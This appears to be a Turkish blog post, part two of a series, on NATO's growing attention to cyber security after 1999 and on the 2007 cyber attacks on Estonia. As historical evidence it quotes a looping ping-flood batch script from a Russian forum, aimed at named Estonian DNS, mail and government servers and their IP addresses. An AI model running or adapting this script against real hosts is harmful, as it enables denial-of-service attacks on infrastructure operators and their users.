Yeni Savaş ve Siber Güvenlik Arasında NATO’nun Yeniden Doğuşu BÖLÜM 2
Bu değerlendirmeden NATO’nun geleneksel savaş üstünlüğünün enformasyon teknolojilerinde yaşanan gelişmeler neticesinde etkisiz kalabileceğinden şüphelendiği sonucuna varılabilir. NATO’nun yeni güvenlik stratejisinin belirlendiği 1999 zirvesinden hemen sonra, devlet ve hükümet başkanlarının katılımıyla Washington’da düzenlenen “21. Yüzyılda İttifak” başlıklı toplantıda, ittifak iyesi ülkelerin savunma imkân ve kabiliyetlerinin artırılması için stratejik tertiplenebilme ve hareket kabiliyetinin yükseltilmesi gerektiği belirtildi. Bu çerçevede etkili enformasyon sistemlerine sahip olunmasının savunma gücünü arttıracağı vurgulandı.29 Kosova müdahalesinden alınan derslerle bu tarihten sonra yayımlanan resmi NATO belgelerinin neredeyse tamamında siber güvenlik konusuna ve “enformasyon sistemleri”nin önemi ve korunması başlıklarına yer verilmiştir. Ne var ki, enformasyon sistemlerinin kimin için ve nasıl güvenli hale getirileceği, güvenliğin sağlanmasının maliyetinin ne olacağı türünde sorularının cevapları verilmemekteydi.
11 Eylül 2001’de New York’taki Dünya Ticaret Merkezi Kuleleri başta olmak üzere çeşitli hedeflere yönelik olarak yolcu uçaklarıyla düzenlenen terör saldırıları, bilinen güvenlik tanımlarını alt üst etti. Güvenlik yeniden birçok ülkenin öncelikler listesinde üst sıralara tırmandı ve “terörizmle savaş” sadece saldırıya uğrayan devleti değil, sistemdeki tüm aktörleri ilgilendiren bir konu başlığına dönüştü. ABD önderliğindeki uluslararası koalisyon, saldırıların ve uluslararası terörün kaynağı olarak görülen El Kaide’ye ortadan kaldırmak amacıyla 2001 sonbaharında Afganistan’a girerek Taliban rejimine son verdi. NATO’da Uluslararası Güvenlik Yardım Gücü (International Security Assistance Force-ISAF) adı altında ve müttefik ülkelerin katılımıyla Afganistan’da görev yapmaya başladı. Bu görev, merkez karargâhı ile alandaki muharip güçler arasında güvenli bilgisayar, telefon ağları ve video konferans bağlantılarının kurulabilmesi konusunu NATO’nun siber alandaki önceliklerinden birisini haline getirdi. Stratejik ve gizli bilgileri taşıyacak bu altyapıların kurulması NATO için bilgi güvenliğinin esasını teşkil etmiştir.
11 Eylül sonrasında tansiyonun yüksek olduğu dönemde üzerinde en çok tartışılan konulardan birisi, NATO’ya ya da üyelerden birine yönelik olarak gerçekleştirilebilecek Dijital Felaket (diğer adıyla dijital 9/11) senaryosudur.30 Bu senaryo çerçevesinde üye devletlerin siber sistemlerine yapılacak herhangi bir saldırının ülkenin kritik alt yapısını etkisiz hale getirmesi ve böylece ülkedeki güvenliği derinden sarsması ele alınmaktaydı. Bu tür endişeler milli güvenlikle kavramıyla yakından ilişkilendirilmekteydi.31 Bu değerlendirmelerin sonuçları 21 Kasım 2002’de düzenlenen Prag Zirvesi’nin gündeminde yansıdı. Zirve’de siber saldırılara karşı savunmanın güçlendirilmesi konusu ele alındı ve NATO’nun gerekli planlamaları yapması karara bağlandı.32 Zirve’de siber güvenlik yapılanması tek başına bir unsur olarak ele alınmamış, askeri kabiliyetlerin arttırılması bağlamında değerlendirilmiştir.
Zirve’de alanına kararı hayata geçirmek amacıyla NATO Ağ ile Etkinleştirilmiş Güç (Network-Enabled Capability-NNEC)33 programı başlatıldı.
Programın amacı NATO’nun askeri ve sivil unsurlarının enformasyon altyapısı aracılığıyla birleştirmesiydi. Anlayış, bilginin yeterince hızlı ve güvenle paylaşılmadığı takdirde üye ülkelerin muhtemel NATO harekâtlarına etkin katılımının mümkün olmayacağı üzerine inşa edilmişti.
Üye ülkelerin ağ yapısı ve askeri potansiyeli bu paylaşımı etkilemektedir. Her ülkenin askeri alt yapısı, eğitim durumu veya ağ niteliği NATO planlarının uygulanmasını etkilemektedir. Siber güvenlik açısından bakıldığından, NNEC ve Ağ merkezli Savaş (Network Centric Warfare-NCW) kavramlarından ziyade bu savaş tarzı için gerekli olan bilişim alt yapısının korunması önemlidir. Bu nedenle, Soğuk Savaş döneminde bu amaçla hizmet veren NATO İletişim ve Enformasyon Sistemleri Ajansı (Communications and Information Systems Agency-NACISA) ve Avrupa İttifak Güçleri Büyük Karargâhları (Supreme Headquarters Allied Powers Europe-SHAPE) Teknik Merkezi, yerlerini 1
Haziran 1996’da kurulan NATO Danışmanlık, Komuta-Kontrol Ajansı’na (NATO Consultation, Command and Control Agency-NC3A)34 bıraktı. Bu ajansın görevi
teknolojik boyuttaki gelişmeleri takip etmek, bunların NATO bünyesinde işlevsel hale gelmesini sağlamak ve NATO’nun askeri yetkililerinin askeri operasyonlar sırasında duydukları acil ihtiyaçlara cevap vermektedir. NC3A, NATO operasyonlarında araştırmadan takibe, hava komuta-kontrolden füze savunmasına, elektronik harpten erken uyarı ve kontrol sistemlerine, iletişimden bilişim sistemlerine kadar birçok sahada görev yapmaktadır. 11 Eylül sonrasında Hibrit Savaş kavramının daha açık bir biçimde ortaya çıkmasına müteakip, bilgi paylaşımı ve ortak komuta-kontrol fikrinin ne derece fonksiyonel olduğu anlaşılmış ve yapılanma günün şartlarına uyumlu hale getirilmiştir. Ağ
merkezli savaş fikrini icra ederken siber güvenliğin öneminin artacağı da açıktır. NC3A yapılanması içinde siber güvenlik ve bilgi paylaşımının sağlanması için faaliyet gösteren bir bölüm de bulunmaktadır. Bu gün ağ merkezli savaşın daha ön plana çıkmasıyla NC3A’nın yapılanması daha da detaylandırılmıştır. Bu haliyle ilk yapılanmasından hayli farklı olduğu görülebilmektedir.35
Aynı dönemde NATO’nun yeni savaş anlayışına uyum sağlamak amacıyla sinyal dinlemek ve işlemek için kurulmuş olan elektronik harp merkezleri de yeniden düzenlendi ve 7 Eylül 2004’te NATO İletişim ve Enformasyon Sistemleri Servisi Ajansı (NATO Communication and Information Systems Services Agency-NCSA) oluşturuldu. 2004 yılında kurulan bu ajans, ağ ile etkinleştirilmiş güç kavramını hayata geçirebilmek için merkez karargâhı ile diğer görev güçleri arasındaki iletişimi sağlamaktadır. Kosova operasyonundan anlaşıldığı üzere siber saldırılar ilk olarak iletişim kanallarına odaklanmaktadır.
Prag Zirvesi’nde alınan kararlardan bir diğeri de kritik alt yapıların terörizme karşı korunması için NATO siber savunma programının oluşturulmasıdır. Bu
yüzden NCSA siber saldırılara karşı ilk müdahaleyi yapacak unsur olarak belirlenmiştir. Ajansın içindeki merkezlerden en önemlisi, muharip unsurların bilgi güvenliği ve ittifak genelinde güvenli iletişimi sağlamakla yükümlü NATO Bilgi Güvenliği Teknik Merkezidir (NATO Information Assurance Technical Centre-NIATC). NATO’nun 2007 yılına kadar iletişim, bilgisayar güvenliği ve siber güvenliği aynı kefeye koyduğunu görülmektedir. NIATC, bilgisayar ağlarını Bilgi Güvenliği Operasyon Merkezi ve NATO Bilgisayar Olayları Müdahale Gücü Teknik Merkezi’yle (NATO Computer Incident Response Capability Technical Centre-NCIRC) işbirliği içinde ve 7/24 esasında takip etmektedir. Bu gelişmeye müteakip 2006’da yapılan Riga Zirvesi’nde ağ ile güçlendirilmiş komuta-kontrol kavramı üzerinde durulmuş ve bilişim alt yapısının savunmasının iyileştirilmesi nin gerektiğine vurgu yapılmıştır.36
Prag Zirvesi’nin NATO’nun siber güvenlik algısı ve strateji mantığının değişiminde bir başlangıç olarak kabul edilmektedir. Ancak bu denli büyük ve köklü alışkanlıklara sahip olan bir kuruluşta değişikliklerin istenilen hızda olmasını beklemek iyimserlik olacaktır. Oysa tehdit olarak tanımlanan asimetrik unsurların kendilerini çabucak güncelledikleri ve hedeflerine düzenli ya da rastgele biçimde sistematik olmayan bir yapıda saldırdıkları görülmektedir. Ayrıca uluslararası sistemde hukukla kayıt altına alınan cezaya tabi fiiller
(casusluk, endüstriyel hırsızlık, bilgisayar korsanlığı, servis durdurmak, vb.) siber ortamda hiç bir kısıtlama olmadan gerçekleştirilmektedir. Siber saldırganlar çeşitli yöntemler kullanarak saldırılarının kaynağını gizlemeye çalışırlar. Bazı saldırılarda yaptıkları eylemi gizlemek için geride bıraktığı izleri sildikleri de görülmüştür. Devletlerin büyük ve hantal işleyişine karşı siber saldırılar hızlı ve asimetrik olarak ortaya çıkmaktadır. Öte yandan siber alanın zaman zaman devletler tarafından yönetilen siber saldırılar için kullanıldığı tahmin edilmektedir. Bürokrasi’nin hareket hızı ile siber saldırının gerçekleşme hızı arasındaki fark da devletlerin bu konuda kolayca mazeretler üretmesine imkân sağlıyor. Her ne kadar aksini belirtseler de, karanlık taraftaki bu korunmuşluk devletler için de cazip geliyor.
İspatı bile mümkün olmayacağı için bütün ithamlarda komplodan öte gitmesi mümkün görünmüyordu. Bu yüzden birçok devlet kullanmış ya da kullanmaktadır. NATO karargâhında ve müttefik ülkelerde bu türde sorunlara nasıl yaklaşılacağı ve sorunlarla hangi yöntemlerle başa çıkılacağı konuları tartışılırken Estonya’ya yapılan uzun süreli ve yoğun siber saldırılar gündemi büyük bir hızla değiştirdi.
Bronz Asker’in Dijital Ordusu
Estonya internet kullanımının en yüksek düzeyde olduğu ülkelerden birisidir. Her vatandaşın devlet kurumlarına ve bankalarına internet üzerinden bağlanmasına imkân veren bir dijital kimliğe sahip olduğu ülkede, 355 devlet kuruluşu sanal dünyada yer almaktadır. Ernsdorff ve Berbec araştırmalarında Estonya’nın e-devlet yapılanmasında Orta ve Doğu Avrupa’da lider ve dünyada üçüncü sırada yer aldıklarını belirtir.37
2001 yılında çalışmaya başlayan veri değişim katmanı olan X-Road programı Estonya’daki kurumları ve insanları birbirine bağlamaktadır. Bu E-devlet programı uygulamaları açısından diğer örneklerine nazaran en gelişmiş örnektir. Estonya, dünya üzerinde internet kullanarak yapılmış olan ilk yerel seçimlere de 2005 yılında ev sahipliği yapmıştır.38 2010 yılı verilerine göre, Estonya’nın 1.46 milyonluk nüfusun yüzde 75’i internet kullanıcısıdır.
Estonya, NATO’nun 2002 Prag Zirvesi sonrasında üyelik görüşmelerine başladı ve Mart 2003’te de üye olarak kabul edildi. Bu süreç ülkenin Rusya’dan zihinsel olarak hızla uzaklaşmasına sebep oldu. Bu çerçevede Estonya’nın başkenti Tallinn’e Kızıl Ordu’nun girişinin ifadesi olarak 1947 yılında yapılmış olan “Tallinn’in Kurtarıcısı Heykeli” ya da popüler adıyla “Bronz Asker” heykeli de bu süreçten nasibini aldı. Heykelin yıkılmasını isteyenler ile yer değiştirmesi gerektiğini savunanlar arasında yürüyen tartışma sonucunda
heykel, hükümetin kararıyla Tallinn’deki askeri mezarlığa taşındı. Rus kökenli Estonya vatandaşlarının39 protesto gösterileri devam ederken ülkenin siber altyapısını hedef alan saldırılar 27 Nisan gece yarısından sonra başladı ve giderek hız kazandı. Ping yoğunluyla başlayan hareket çok hızlı bir şekilde servis dışı bırakma saldırısına dönüştü.40 Çeşitli Rus internet forumlarında Estonya’daki adresler hedef olarak gösterildi ve teknik bilgisi olmayan sıradan bilgisayar kullanıcılarına kadar ulaşan bir kitleye saldırıyı gerçekleştirmenin
yöntemleri açıklanarak saldırı yaygınlaştırıldı. Ülkedeki Hansabank ve SEB gibi bankalar siber saldırılara hazırlıklı oldukları için ilk gün yapılan saldırılardan çok zarar görmediler.
Fakat hazırlıksız olan Estonya hükümet siteleri işlevlerini yerine getiremez hale geldi.
Başkanlık ve parlamento siteleri, bütün bakanlık siteleri, siyasi partilerin siteleri bu hedefler arasındaydı. Estonya’daki altı büyük medya kuruluşu ve iletişim firmaları da saldırıdan nasibini aldı.41 Ülkede IP’leri kontrol eden ve izleyen sistemlerin olmaması da tehdidi daha hissedilir hale getirdi. Saldırılara tek cevap verecek kurum ülkedeki e-seçimlerin alt yapısını kuran uzmanlardı. 28 Nisan’da zirve noktasına ulaşan saldırılar yavaş yavaş azaldı ve 3 Mayıs’ta aralarında ping taşması şeklinde tanımlanan saldırıların da olduğu kontrol edilebilir seviyedeki saldırılar başladı. Rusya’nın İkinci Dünya Savaşı’nda Nazi Almanya’sını yendiği gün olan 9 Mayıs’ta da botnet saldırıları başladı.42 11 Mayıs’ta yavaşlayan bu saldırılar, 18 Mayıs’ta tekrar başladı ve 23 Mayıs’a kadar devam etti. Çok sayıda Rus sitesinin katıldığı bu saldırılar sırasında Rusya’daki
http://2ch.ru ve http:// forum.xaker.ru sitelerinin kullanıcılarını basit programlarla saldırıya katılımı teşvik ettiği bilinmektedir. Özellikle kanal genişliği doldurmak amacıyla ping saldırıları detaylı bir şekilde belirtilmiştir.
Bir Rus sitesinden alınan ping yaparak bant genişliğini doldurmayı hedefleyen bu saldırı da belirli adresler ve IP numaraları da verilmiştir:
@echo off
SET PING_COUNT=50
SET PING_TOMEOUT=1000
:PING
echo Pinguem estonskie servera
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% dns.estpak.ee
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 194.126.115.18
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns.eenet.ee
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 193.40.56.245
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns.kbfi.ee
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 193.40.133.222
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns.online.ee
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 194.106.96.21
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns.uninet.ee
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 194.204.0.1
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns.ut.ee
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 193.40.5.99
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns.uu.net
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 137.39.1.3
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% sunic.sunet.se
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 192.36.125.2
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% muheleja.eenet.ee
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 193.40.0.132
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns2.eenet.ee
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 193.40.0.12
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% kbfi.ee
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 194.204.58.129
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% smtp.uninet.ee
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 194.204.0.4
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ptah.kbfi.ee
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 194.204.58.129
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns.gov.ee
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 195.80.106.241
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns.aso.ee
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 195.80.96.222
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns2.ut.ee
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 193.40.5.76
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% mail.gov.ee
GOTO PING43
İnternet forumundaki mesajda, Estonya’nın Rusları aşağılanmasına son vermek için bu saldırıların yapıldığı ve hükümet sitesinin artık çalışmadığı belirtilmekte dir. Ayrıca başka hedeflere saldırabilmek için sonsuzluk döngüsüyle çalışan yukarıdaki programcığı yazdıkları ve “bat” uzantılı dosya oluşturarak e-posta ve alan adı sunucularını (domain name server-dns) çökertebilecekleri de mesajda yer alıyordu.44 Başka bir sitede de saldırıların 9 Mayıs gece yarısında yapılması tavsiye edilmekteydi.45 X-Road sistemini çökertmek için daha teknik beceri gerektiren esrarengiz veri paketlerinin router’lara gönderildiği de farklı kaynaklarda belirtilmekteydi.46 Dağıtık servis dışı bırakma saldırısı ile ABD, Kanada, Rusya, Türkiye, Almanya, Belçika, Mısır ve Vietnam gibi ülkelerden gelen IP’ler kaydedilmişti.
Bu kayıtlara bakıldığında Estonya için saldırılarda düşmanın ve saldırganın kim olduğu açık değildir.
Estonya hükümeti saldırıların etkisini azaltmak için bant genişliğini iki Gbps’ten 8 Gbps’e çıkardı. Özel sektör de sunucuların sayısını ve alan genişliğini arttırdı.
3 CÜ BÖLÜM İLE DEVAM EDECEKTİR.,
***
Hiç yorum yok:
Yorum Gönder